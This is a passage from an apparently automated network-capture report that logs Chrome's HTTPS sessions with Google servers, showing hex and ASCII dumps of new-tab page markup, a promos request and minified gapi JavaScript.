2024-11-11 09:33:07 UTC	1378	IN	Data Raw: 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c Data Ascii: 03c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\
2024-11-11 09:33:07 UTC	1378	IN	Data Raw: 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 73 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 Data Ascii: role\u003d\"button\" tabindex\u003d\"0\"\u003e \u003csvg class\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l22
2024-11-11 09:33:07 UTC	1378	IN	Data Raw: 32 2c 32 7a 4d 36 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 Data Ascii: 2,2zM6,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1
2024-11-11 09:33:07 UTC	1378	IN	Data Raw: 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 32 30 2c 33 37 30 30 39 34 39 2c 33 37 30 31 30 37 31 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 Data Ascii: ft_product_control-label1","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700320,3700949,3701071,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access
2024-11-11 09:33:07 UTC	1378	IN	Data Raw: 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 52 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 53 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 54 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 53 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 50 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 6a 68 5c 75 30 30 33 64 61 7d 7d 3b 5f Data Ascii: .length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Rd\u003dglobalThis.trustedTypes;_.Sd\u003dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.Td\u003dnew _.Sd(\"about:invalid#zClosurez\");_.Pd\u003dclass{constructor(a){this.jh\u003da}};_
2024-11-11 09:33:07 UTC	1378	IN	Data Raw: 6f 66 20 5f 2e 53 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 67 65 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 69 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 Data Ascii: of _.Sd)a\u003da.i;else throw Error(\"F\");else a\u003d_.ge(a);return a};_.ie\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003d
2024-11-11 09:33:07 UTC	370	IN	Data Raw: 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 75 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 47 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 74 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 64 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 74 65 5b 64 5d 2c 63 29 3a Data Ascii: e(\"*\"))[0]\|\|null));return a\|\|null};\n_.ue\u003dfunction(a,b){_.Gb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d\u003d\"for\"?a.htmlFor\u003dc:te.hasOwnProperty(d)?a.setAttribute(te[d],c):
2024-11-11 09:33:07 UTC	285	IN	Data Raw: 31 31 36 0d 0a 73 70 61 63 69 6e 67 3a 5c 22 63 65 6c 6c 53 70 61 63 69 6e 67 5c 22 2c 63 6f 6c 73 70 61 6e 3a 5c 22 63 6f 6c 53 70 61 6e 5c 22 2c 66 72 61 6d 65 62 6f 72 64 65 72 3a 5c 22 66 72 61 6d 65 42 6f 72 64 65 72 5c 22 2c 68 65 69 67 68 74 3a 5c 22 68 65 69 67 68 74 5c 22 2c 6d 61 78 6c 65 6e 67 74 68 3a 5c 22 6d 61 78 4c 65 6e 67 74 68 5c 22 2c 6e 6f 6e 63 65 3a 5c 22 6e 6f 6e 63 65 5c 22 2c 72 6f 6c 65 3a 5c 22 72 6f 6c 65 5c 22 2c 72 6f 77 73 70 61 6e 3a 5c 22 72 6f 77 53 70 61 6e 5c 22 2c 74 79 70 65 3a 5c 22 74 79 70 65 5c 22 2c 75 73 65 6d 61 70 3a 5c 22 75 73 65 4d 61 70 5c 22 2c 76 61 6c 69 67 6e 3a 5c 22 76 41 6c 69 67 6e 5c 22 2c 77 69 64 74 68 3a 5c 22 77 69 64 74 68 5c 22 7d 3b 5c 6e 5f 2e 76 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f Data Ascii: 116spacing:\"cellSpacing\",colspan:\"colSpan\",frameborder:\"frameBorder\",height:\"height\",maxlength:\"maxLength\",nonce:\"nonce\",role:\"role\",rowspan:\"rowSpan\",type:\"type\",usemap:\"useMap\",valign:\"vAlign\",width:\"width\"};\n_.ve\u003dfunctio

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49711	142.250.185.100	443	7060	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:07 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-11 09:33:07 UTC	957	IN	HTTP/1.1 200 OK Version: 693618659 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Mon, 11 Nov 2024 09:33:07 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-11 09:33:07 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-11-11 09:33:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49719	172.217.16.142	443	7060	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:09 UTC	741	OUT	GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1 Host: apis.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-11 09:33:10 UTC	916	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access" Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]} Content-Length: 117949 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Fri, 08 Nov 2024 07:44:13 GMT Expires: Sat, 08 Nov 2025 07:44:13 GMT Cache-Control: public, max-age=31536000 Last-Modified: Thu, 10 Oct 2024 19:55:27 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Age: 265737 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-11 09:33:10 UTC	462	IN	Data Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 30 78 38 30 30 30 30 30 2c 20 5d 29 3b 0a 76 61 72 20 64 61 2c 65 61 2c 68 61 2c 6e 61 2c 6f 61 2c 73 61 2c 74 61 2c 77 61 3b 64 61 3d 66 75 6e Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x800000, ]);var da,ea,ha,na,oa,sa,ta,wa;da=fun
2024-11-11 09:33:10 UTC	1378	IN	Data Raw: 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 Data Ascii: ototype)return a;a[b]=c.value;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)ret
2024-11-11 09:33:10 UTC	1378	IN	Data Raw: 76 61 72 20 62 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 7b 6e 65 78 74 3a 64 61 28 61 29 7d 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 62 60 22 2b 53 74 72 69 6e 67 28 61 29 29 3b 7d 3b 73 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 62 29 7d 3b 74 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 61 Data Ascii: var b=typeof Symbol!="undefined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{next:da(a)};throw Error("b`"+String(a));};sa=function(a,b){return Object.prototype.hasOwnProperty.call(a,b)};ta=typeof Object.a
2024-11-11 09:33:10 UTC	1378	IN	Data Raw: 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 46 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69 73 2e 4e 72 3d 5b 5d 3b 74 68 69 73 2e 68 56 3d 21 31 3b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 74 72 79 7b 68 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 63 61 74 63 68 28 6c 29 7b 6b 2e 72 65 6a 65 63 74 28 6c 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6a 46 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 6d 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6c 7c 7c 28 6c 3d 21 30 2c 6d 2e 63 61 6c 6c 28 6b 2c 6e 29 29 7d 7d 76 61 72 20 6b 3d 74 68 69 73 2c 6c 3d 21 31 3b 72 65 74 75 72 6e 7b 72 65 73 6f 6c 76 65 3a 68 28 74 68 69 73 2e 53 64 61 29 2c 72 65 6a 65 63 Data Ascii: =function(h){this.Fa=0;this.wf=void 0;this.Nr=[];this.hV=!1;var k=this.jF();try{h(k.resolve,k.reject)}catch(l){k.reject(l)}};e.prototype.jF=function(){function h(m){return function(n){l\|\|(l=!0,m.call(k,n))}}var k=this,l=!1;return{resolve:h(this.Sda),rejec
2024-11-11 09:33:10 UTC	1378	IN	Data Raw: 2e 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 47 37 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 4e 72 21 3d 6e 75 6c 6c 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 74 68 69 73 2e 4e 72 2e 6c 65 6e 67 74 68 3b 2b 2b 68 29 66 2e 58 4f 28 74 68 69 73 2e 4e 72 5b 68 5d 29 3b 0a 74 68 69 73 2e 4e 72 3d 6e 75 6c 6c 7d 7d 3b 76 61 72 20 66 3d 6e 65 77 20 62 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 79 66 61 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 68 2e 69 79 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 7a 66 61 3d 66 75 6e Data Ascii: .promise=this;h.reason=this.wf;return l(h)};e.prototype.G7=function(){if(this.Nr!=null){for(var h=0;h<this.Nr.length;++h)f.XO(this.Nr[h]);this.Nr=null}};var f=new b;e.prototype.yfa=function(h){var k=this.jF();h.iy(k.resolve,k.reject)};e.prototype.zfa=fun
2024-11-11 09:33:10 UTC	1378	IN	Data Raw: 72 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 61 72 74 73 57 69 74 68 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 76 61 72 20 64 3d 45 61 28 74 68 69 73 2c 62 2c 22 73 74 61 72 74 73 57 69 74 68 22 29 2c 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 62 2e 6c 65 6e 67 74 68 3b 63 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 63 7c 30 2c 64 2e 6c 65 6e 67 74 68 29 29 3b 66 Data Ascii: ror("First argument to String.prototype."+c+" must not be a regular expression");return a+""};na("String.prototype.startsWith",function(a){return a?a:function(b,c){var d=Ea(this,b,"startsWith"),e=d.length,f=b.length;c=Math.max(0,Math.min(c\|0,d.length));f
2024-11-11 09:33:10 UTC	1378	IN	Data Raw: 61 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 47 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 72 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 65 22 29 3b 64 28 6c 29 3b 69 66 28 21 73 61 28 6c 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 66 60 22 2b 6c 29 3b 6c 5b 66 5d 5b 74 68 69 73 2e 47 61 5d 3d 6d 3b 72 65 74 75 72 6e 20 Data Ascii: ar h=0,k=function(l){this.Ga=(h+=Math.random()+1).toString();if(l){l=_.ra(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Error("e");d(l);if(!sa(l,f))throw Error("f`"+l);l[f][this.Ga]=m;return
2024-11-11 09:33:10 UTC	1378	IN	Data Raw: 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 52 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 52 6b 3d 0a 6b 2e 5a 65 2e 52 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 52 6b 3d 66 28 29 3b 74 68 69 Data Ascii: te=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length\|\|delete this[0][k.id],k.Ze.Rk.next=k.Ze.next,k.Ze.next.Rk=k.Ze.Rk,k.Ze.head=null,this.size--,!0):!1};c.prototype.clear=function(){this[0]={};this[1]=this[1].Rk=f();thi
